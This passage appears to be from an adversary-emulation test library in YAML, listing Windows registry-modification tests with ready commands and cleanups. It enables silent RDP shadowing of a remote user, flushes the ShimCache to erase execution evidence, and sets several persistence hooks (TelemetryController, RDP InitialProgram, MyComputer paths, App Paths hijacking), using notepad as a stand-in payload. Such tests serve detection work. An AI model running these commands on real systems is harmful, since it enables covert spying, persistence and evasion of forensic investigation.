    In order to configure RDP shadowing session in a quiet mode.  The registry of a remote system can be updated using several protocols, depending on the accessible ports and configuration of the services listening on those ports. Our aim is to set the Shadow value in HKLM\Software\Policies\Microsoft\Windows NT\Terminal Services on the remote machine to 2, which allows us to both view and control the session without the user being informed.
    [Reference](https://blog.bitsadmin.com/spying-on-users-using-rdp-shadowing)
  supported_platforms:
  - windows
  input_arguments:
    server_name:
      description: The remote server that we need to shadow and have to do the registry modification.
      type: string
      default: localhost
  executor:
    command: |-
       $s= New-CimSession -Computername #{server_name} -SessionOption (New-CimSessionOption -Protocol Dcom)
       Get-CimInstance -Namespace ROOT\StandardCimv2 -ClassName MSFT_NetFirewallRule -Filter 'DisplayName="Remote Desktop - Shadow (TCP-In)"' -CimSession $s | Invoke-CimMethod -MethodName Enable
       Invoke-CimMethod -ClassName StdRegProv -MethodName SetDWORDValue -Arguments @{hDefKey=[uint32]2147483650; sSubKeyName="Software\Policies\Microsoft\Windows NT\Terminal Services"; sValueName="shadow"; uValue=[uint32]2} -CimSession $s
    cleanup_command: |
       Invoke-CimMethod -ClassName StdRegProv -MethodName DeleteValue -Arguments @{hDefKey=[uint32]2147483650; sSubKeyName="Software\Policies\Microsoft\Windows NT\Terminal Services"; sValueName="Shadow"} -CimSession $s
    name: powershell
    elevation_required: true
- name: Flush Shimcache 
  auto_generated_guid: ecbd533e-b45d-4239-aeff-b857c6f6d68b
  description: |-
    The ShimCache is a component in Windows operating systems that stores information about recently executed applications. It is used by the operating system to speed up the launching process of applications. The ShimCache is also used by IR teams and Forensic teams. Forensic investigators can use the ShimCache to determine which programs have been executed on a system, even if they have been deleted or their logs have been cleared.Reference : https://blueteamops.medium.com/shimcache-flush-89daff28d15e
  supported_platforms:
  - windows 
  executor:
    command: |-
       Rundll32.exe apphelp.dll,ShimFlushCache
    name: command_prompt
    elevation_required: true
- name: Disable Windows Remote Desktop Protocol
  auto_generated_guid: 5f8e36de-37ca-455e-b054-a2584f043c06
  description: |
    Modify the registry of the machine to disable remote desktop protocol.
  supported_platforms:
  - windows
  executor:
    command: | 
       reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
    cleanup_command: |
       reg delete "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f
    name: command_prompt
    elevation_required: true
- name: Enforce Smart Card Authentication Through Registry
  auto_generated_guid: 4c4bf587-fe7f-448f-ba8d-1ecec9db88be
  description: |
    Enforce Smart Card Authentication Through Registry
  supported_platforms:
  - windows
  executor:
    command: | 
       reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v scforceoption /t REG_DWORD /d 1 /f
    cleanup_command: |
       reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v scforceoption /f
    name: command_prompt
    elevation_required: true
- name: Requires the BitLocker PIN for Pre-boot authentication
  auto_generated_guid: 26fc7375-a551-4336-90d7-3f2817564304
  description: |
    Requires the BitLocker PIN for Pre-boot authentication
  supported_platforms:
  - windows
  executor:
    command: | 
       reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseAdvancedStartup /t REG_DWORD /d 1 /f
    cleanup_command: |
       reg delete "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseAdvancedStartup /f
    name: command_prompt
    elevation_required: true
- name: Modify EnableBDEWithNoTPM Registry entry 
  auto_generated_guid: bacb3e73-8161-43a9-8204-a69fe0e4b482
  description: |
    Allow BitLocker without a compatible TPM (requires a password)
  supported_platforms:
  - windows
  executor:
    command: | 
       reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v EnableBDEWithNoTPM /t REG_DWORD /d 1 /f
    cleanup_command: |
       reg delete ""HKLM\SOFTWARE\Policies\Microsoft\FVE"" /v EnableBDEWithNoTPM /f
    name: command_prompt
    elevation_required: true
- name: Modify UseTPM Registry entry 
  auto_generated_guid: 7c8c7bd8-0a5c-4514-a6a3-0814c5a98cf0
  description: |
    Use Trusted Platform Module (TPM) for Bitlocker tool
  supported_platforms:
  - windows
  executor:
    command: | 
       reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPM /t REG_DWORD /d 2 /f
    cleanup_command: |
       reg delete ""HKLM\SOFTWARE\Policies\Microsoft\FVE"" /v UseTPM /f
    name: command_prompt
    elevation_required: true
- name: Modify UseTPMPIN Registry entry 
  auto_generated_guid: 10b33fb0-c58b-44cd-8599-b6da5ad6384c
  description: |
    Allow startup PIN with TPM for Bitlocker tool
  supported_platforms:
  - windows
  executor:
    command: | 
       reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPMPIN /t REG_DWORD /d 2 /f
    cleanup_command: |
       reg delete "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPMPIN /f
    name: command_prompt
    elevation_required: true
- name: Modify UseTPMKey Registry entry 
  auto_generated_guid: c8480c83-a932-446e-a919-06a1fd1e512a
  description: |
    Allow startup key with TPM for Bitlocker tool
  supported_platforms:
  - windows
  executor:
    command: | 
       reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPMKey /t REG_DWORD /d 2 /f
    cleanup_command: |
       reg delete "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPMKey /f
    name: command_prompt
    elevation_required: true
- name: Modify UseTPMKeyPIN Registry entry 
  auto_generated_guid: 02d8b9f7-1a51-4011-8901-2d55cca667f9
  description: |
    Allow startup key and PIN with TPM for Bitlocker tool
  supported_platforms:
  - windows
  executor:
    command: | 
       reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPMKeyPIN /t REG_DWORD /d 2 /f
    cleanup_command: |
       reg delete "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPMKeyPIN /f
    name: command_prompt
    elevation_required: true
- name: Modify EnableNonTPM Registry entry 
  auto_generated_guid: e672a340-a933-447c-954c-d68db38a09b1
  description: |
    Allow Bitlocker without TPM for Bitlocker tool
  supported_platforms:
  - windows
  executor:
    command: | 
       reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v EnableNonTPM /t REG_DWORD /d 1 /f
    cleanup_command: |
       reg delete "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v EnableNonTPM /f
    name: command_prompt
    elevation_required: true
- name: Modify UsePartialEncryptionKey Registry entry 
  auto_generated_guid: b5169fd5-85c8-4b2c-a9b6-64cc0b9febef
  description: |
    Allow startup key with TPM for Bitlocker tool
  supported_platforms:
  - windows
  executor:
    command: | 
       reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UsePartialEncryptionKey /t REG_DWORD /d 2 /f
    cleanup_command: |
       reg delete "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UsePartialEncryptionKey /f
    name: command_prompt
    elevation_required: true
- name: Modify UsePIN Registry entry 
  auto_generated_guid: 3ac0b30f-532f-43c6-8f01-fb657aaed7e4
  description: |
    Allow startup PIN with TPM for Bitlocker tool
  supported_platforms:
  - windows
  executor:
    command: | 
       reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UsePIN /t REG_DWORD /d 2 /f
    cleanup_command: |
       reg delete "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UsePIN /f
    name: command_prompt
    elevation_required: true

- name: Abusing Windows TelemetryController Registry Key for Persistence
  auto_generated_guid: 4469192c-2d2d-4a3a-9758-1f31d937a92b
  description: |
    The Windows Compatibility Telemetry system makes use of the CompatTelRunner.exe binary to run a variety of telemetry tasks. It relies on the registry for instructions on which commands to run. 
    It will run any arbitrary command without restriction of location or type. Blog :https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence
  supported_platforms:
  - windows
  input_arguments:
    new_key:
      description: New Registry Key Added
      type: string
      default: NewKey  
    new_executable:
      description: Custom Executable to run
      type: string
      default: C:\Windows\System32\notepad.exe  
  executor:
    command: |
      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\#{new_key}" /t REG_SZ /v Command /d #{new_executable} /f
    cleanup_command: |
      reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\#{new_key}" /f
    name: command_prompt
    elevation_required: true

- name: Modify RDP-Tcp Initial Program Registry Entry
  auto_generated_guid: c691cee2-8d17-4395-b22f-00644c7f1c2d
  description: |
    If the fInheritInitialProgram value is set to 1, the exe indicated in the InitialProgram value is automatically started on RDP connection.
    Once the test commands are run, notepad will execute automatically on new RDP connection
  supported_platforms:
  - windows
  executor:
    command: | 
      reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v fInheritInitialProgram /t REG_DWORD /d 1 /f
      reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v InitialProgram /t REG_SZ /d "C:\Windows\System32\notepad.exe" /f
    cleanup_command: |
      reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v InitialProgram /t REG_SZ /d "" /f
    name: command_prompt
    elevation_required: true

- name: Abusing MyComputer Disk Cleanup Path for Persistence
  auto_generated_guid: f2915249-4485-42e2-96b7-9bf34328d497
  description: |
    Replacing the registry settings with custom executable will end up with the replacement programs being executed at the time OS will decide to kick off the respective activity
  supported_platforms:
  - windows  
  executor:
    command: |
      reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\cleanuppath" /t REG_EXPAND_SZ /d "%systemroot%\system32\notepad.exe" /f
    cleanup_command: |
      reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\cleanuppath" /t REG_EXPAND_SZ /d "%SystemRoot%\System32\cleanmgr.exe /D %c" /f
    name: command_prompt
    elevation_required: true
- name: Abusing MyComputer Disk Fragmentation Path for Persistence
  auto_generated_guid: 3235aafe-b49d-451b-a1f1-d979fa65ddaf
  description: |
    Replacing the registry settings with custom executable will end up with the replacement programs being executed at the time OS will decide to kick off the respective activity
  supported_platforms:
  - windows  
  executor:
    command: |
      reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\DefragPath" /t REG_EXPAND_SZ /d "%systemroot%\system32\notepad.exe" /f
    cleanup_command: |
      reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\DefragPath" /t REG_EXPAND_SZ /d "%systemroot%\system32\dfrgui.exe" /f
    name: command_prompt
    elevation_required: true
- name: Abusing MyComputer Disk Backup Path for Persistence
  auto_generated_guid: 599f3b5c-0323-44ed-bb63-4551623bf675
  description: |
    Replacing the registry settings with custom executable will end up with the replacement programs being executed at the time OS will decide to kick off the respective activity
  supported_platforms:
  - windows  
  executor:
    command: |
      reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\BackupPath" /t REG_EXPAND_SZ /d "%systemroot%\system32\notepad.exe" /f
    cleanup_command: |
      reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\BackupPath" /t REG_EXPAND_SZ /d "%SystemRoot%\system32\sdclt.exe" /f
    name: command_prompt
    elevation_required: true

- name: Adding custom paths for application execution
  auto_generated_guid: 573d15da-c34e-4c59-a7d2-18f20d92dfa3
  description: |
    As per Microsoft,the entries found under App Paths are used primarily to map an application’s executable file name to that file’s fully qualified path and to pre-pend information to the PATH environment variable on a per-application, per-process basis. 
    The path can be modified to load a custom application of choice. 
    Post the registry changes of this test, when someone tries to manually run msedge.exe via StartMenu/Run window , notepad will be launched.
  supported_platforms:
  - windows 
  input_arguments:
    app_name:
      description: path of application to be modified
      type: string
      default: msedge.exe 
    new_path:
      description: New App Path Added
      type: string
      default: C:\Windows\System32\notepad.exe 
  executor:
    command: |
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\#{app_name}" /t REG_SZ /d #{new_path} /f
    cleanup_command: |
      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\#{app_name}" /v (Default) /f
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\#{app_name}" /t REG_SZ /d "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /f
    name: command_prompt
    elevation_required: true